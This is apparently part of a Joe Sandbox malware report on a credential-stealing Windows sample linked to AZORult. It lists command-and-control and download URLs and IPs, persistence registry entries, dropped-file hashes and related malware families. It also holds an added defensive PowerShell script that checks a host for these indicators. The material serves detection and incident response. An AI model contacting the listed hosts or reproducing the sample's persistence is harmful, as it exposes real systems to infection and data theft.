                                                                      https://iplogger.org/rules/ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.remobjects.com/pscexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drfalse
                                                                          high
                                                                          http://92.63.192.63/index.phpMupdate.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.chameleon-managers.com3V$mP$mPcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://2no.co/ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796709623.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://crl.uETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.79.229 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
92.63.192.63 | unknown | Russian Federation | 44636 | ITDELUXE-ASRU | true
172.217.16.212 | neosoft-activator.appspot.com | United States | 15169 | GOOGLEUS | false
142.250.185.115 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1583137
                                                                          Start date and time:2025-01-02 02:26:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 15s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:25
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ETVk1yP43q.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:56ecf4355112dcd2f73e04d0d1784178.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.spyw.evad.winEXE@29/46@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 92.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 61%
                                                                          • Number of executed functions: 152
                                                                          • Number of non-executed functions: 113
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target ChameleonFolder.exe, PID 5776 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:27:18 | Task Scheduler | Run new task: Chameleon Folder-user path: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
01:27:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
01:27:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
01:27:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
01:27:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
20:27:08 | API Interceptor | 2x Sleep call for process: ETVk1yP43q.exe modified
20:27:29 | API Interceptor | 1282x Sleep call for process: ChameleonExplorer.exe modified
20:28:08 | API Interceptor | 13947x Sleep call for process: ChameleonFolder.exe modified
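The Run values, scheduled task and install path recorded in the timeline above are the host-side artifacts a responder can check for directly. The PowerShell below is an added example written for this report; it is not Joe Sandbox output and not code from the sample. It queries exactly the value names, task name and directory listed in the timeline, hashes whatever executables sit in that directory, and looks for live TCP connections to 92.63.192.63, the only address the IP table marks malicious. One caveat when reading the results: cexplorer.exe and cexplorer.tmp carry the dk-soft.org and chameleon-managers.com strings listed in the URL table, so the Chameleon Explorer autostarts on their own show only that the bundled installer ran; the indicator that carries the AZORult verdict is update.exe and its index.php traffic to 92.63.192.63, which is why the network check is included.

```powershell
# Added example for Joe Sandbox report 1583137: check a host for the persistence
# and network artifacts listed in the analysis timeline and IP table.
# Not Joe Sandbox code and not part of the sample. Run from an elevated session.

$RunValues  = @('Chameleon Explorer', 'Chameleon Folder')   # value names from the Autostart rows
$InstallDir = 'C:\Program Files (x86)\Chameleon Explorer'   # path from the Autostart rows
$TaskName   = 'Chameleon Folder-user'                        # name from the Task Scheduler row
$C2Address  = '92.63.192.63'                                 # only IP the report marks malicious

$findings = @()

# 1. HKCU\...\Run for every loaded user hive. The sandbox logged the same key
#    twice (HKCU and HKCU64 views); on disk it is one key per user, so one pass
#    over HKEY_USERS covers both. Hives of users not logged on are not loaded.
$runKeys = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' } |
    ForEach-Object { "Registry::$($_.Name)\Software\Microsoft\Windows\CurrentVersion\Run" }

foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($name in $RunValues) {
        $value = $props.PSObject.Properties[$name]
        if ($value) {
            $findings += [pscustomobject]@{ Type = 'Autostart'; Where = $key; Detail = "$name = $($value.Value)" }
        }
    }
}

# 2. The scheduled task created during the run.
$task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
if ($task) {
    $action = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings += [pscustomobject]@{ Type = 'ScheduledTask'; Where = $task.TaskPath; Detail = "$TaskName -> $action" }
}

# 3. The install directory and the executables dropped into it, hashed so they
#    can be compared against the dropped-file hashes in the report.
if (Test-Path $InstallDir) {
    Get-ChildItem -Path $InstallDir -Filter '*.exe' -File -ErrorAction SilentlyContinue | ForEach-Object {
        $hash = (Get-FileHash -Algorithm SHA256 -Path $_.FullName).Hash
        $findings += [pscustomobject]@{ Type = 'File'; Where = $_.FullName; Detail = "SHA256 $hash" }
    }
}

# 4. Live connections to the flagged address (update.exe in the report), with
#    the owning process so a hit can be tied to a binary.
Get-NetTCPConnection -RemoteAddress $C2Address -ErrorAction SilentlyContinue | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    $findings += [pscustomobject]@{
        Type   = 'Network'
        Where  = "$($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort) ($($_.State))"
        Detail = "PID $($_.OwningProcess) $($proc.ProcessName)"
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No artifacts from report 1583137 found on this host.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

A Network hit, or an Autostart hit together with an unknown executable in the install directory, is worth escalating; an Autostart hit alone matches the legitimate Chameleon Explorer installer and needs the dropped-file hashes from the report to decide.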
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.79.229 | cheat_roblox.exe | malicious | XWorm |
 | roblox cheat.exe | malicious | XWorm |
 | C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe | malicious | Bdaejec, BitCoin Miner, Xmrig |
 | lSmb6nDsrC.exe | malicious | SmokeLoader |
 | setup.exe | malicious | Unknown |
 | setup.exe | malicious | Unknown |
 | Og1SeeXcB2.exe | malicious | Remcos, Blank Grabber, PrivateLoader, SmokeLoader |
 | file.exe | malicious | SmokeLoader |
 | setup.hta | malicious | RHADAMANTHYS |
 | setup.lnk | malicious | RHADAMANTHYS |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
2no.co | cheat_roblox.exe | malicious | XWorm | 104.21.79.229
 | roblox cheat.exe | malicious | XWorm | 104.21.79.229
 | cheat_roblox.exe | malicious | XWorm | 172.67.149.76
 | roblox cheat.exe | malicious | XWorm | 172.67.149.76
 | C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe | malicious | Bdaejec, BitCoin Miner, Xmrig | 104.21.79.229
 | lSmb6nDsrC.exe | malicious | SmokeLoader | 104.21.79.229
 | setup.exe | malicious | Unknown | 104.21.79.229
 | setup.exe | malicious | Unknown | 104.21.79.229
 | file.exe | malicious | XenoRAT | 172.67.149.76
 | Og1SeeXcB2.exe | malicious | Remcos, Blank Grabber, PrivateLoader, SmokeLoader | 104.21.79.229
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | AimStar.exe | malicious | Blank Grabber | 162.159.128.233
 | 7FEGBYFBHFBJH32.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.96.3
 | 16oApcahEa.exe | malicious | Babuk, Djvu | 104.21.32.1
 | UhsjR3ZFTD.exe | malicious | LummaC |
                                                                                              • 104.21.32.1
                                                                                              544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.220.198
                                                                                              KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.157.254
                                                                                              01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.198.102
                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.21.16
                                                                                              ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, NymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                              • 185.156.72.65
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.79.229
                                                                                              37f463bf4616ecd445d4a1937da06e1916oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                              • 172.217.16.212
                                                                                              6a7e35.msiGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                                                                              • 172.217.16.212
                                                                                              0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              1.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                  C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                    0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                        0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15091304
                                                                                                          Entropy (8bit):6.181292047546881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                          MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                          SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                          SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
• Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..|.......h4................................... ..(....................}..........|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4644456
                                                                                                          Entropy (8bit):6.624930231136082
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                          MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                          SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                          SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Joe Sandbox View:
• Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):146536
                                                                                                          Entropy (8bit):5.3703743168809845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                          MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                          SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                          SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                          SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
• Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                          SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
